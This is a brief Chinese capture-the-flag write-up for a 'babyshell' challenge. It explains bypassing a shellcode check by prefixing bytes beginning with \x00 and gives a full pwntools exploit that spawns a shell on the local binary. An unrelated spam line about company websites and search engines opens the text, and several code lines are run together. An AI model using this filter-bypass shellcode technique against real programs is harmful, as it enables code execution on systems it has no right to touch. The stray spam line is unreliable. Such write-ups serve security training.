做公司網(wǎng)站的公谷歌搜索引擎入口363
查看保護(hù)
查看ida
這里就是要輸入shellcode,但是函數(shù)會(huì)有檢測。
在shellcode前面構(gòu)造一個(gè)以\x00機(jī)器碼開頭的匯編指令,這樣就可以繞過函數(shù)檢查了。
完整exp:
from pwn import*
context(log_level='debug',arch='amd64')
p=process('./babyshell')shellcode=b'\x00\x42\x00'+asm(shellcraft.sh())p.sendafter(b'give me shellcode, plz:',shellcode)
p.interactive()